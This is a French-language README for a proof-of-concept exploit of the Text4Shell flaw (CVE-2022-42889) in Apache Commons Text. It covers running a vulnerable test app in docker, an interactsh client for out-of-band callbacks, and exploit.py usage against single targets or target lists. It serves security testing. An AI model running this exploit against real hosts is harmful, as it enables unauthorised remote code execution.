
CVE-2022-42889 - Text4Shell exploit
Ceci est une preuve de concept exploitant la vulnérabilité dans Apache Commons Text [CVE-2022-42889]
Versions vulnérables : 1.5.0 à (non incluse) 1.10.0
L'exploitation réussie de cette vulnérabilité permet à un attaquant non authentifié d'exécuter du code arbitraire sur l'actif vulnérable
Application développée par @securekomodo, est jointe ici.
Cette application peut également être chargée depuis le registre docker
docker run -p 8080:8080 gokul2/text4shell-poc:latest
L'application sera maintenant disponible à localhost:8080.
Pour vérifier l'exécution arbitraire de commandes, nous utilisons interactsh, un outil pour capturer les interactions OOB par @projectdiscovery.
Configurez le client interactsh avant d'exécuter l'exploit réel.
docker run projectdiscovery/interactsh-client:latest
Prenez note du domaine listé après le démarrage de l'application
[INF] Listing 1 payload for OOB Testing
[INF] xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx.oast.pro
python3 exploit.py -u [host] -i [input-file-with-targets] -v [interactsh client domain] -p [proxy(optional)]
python3 exploit.py -u [host] -t [single target path] -v [interactsh client domain] -p [proxy(optional)]
Vérifiez les logs dans le client interactsh pour valider l'exploit.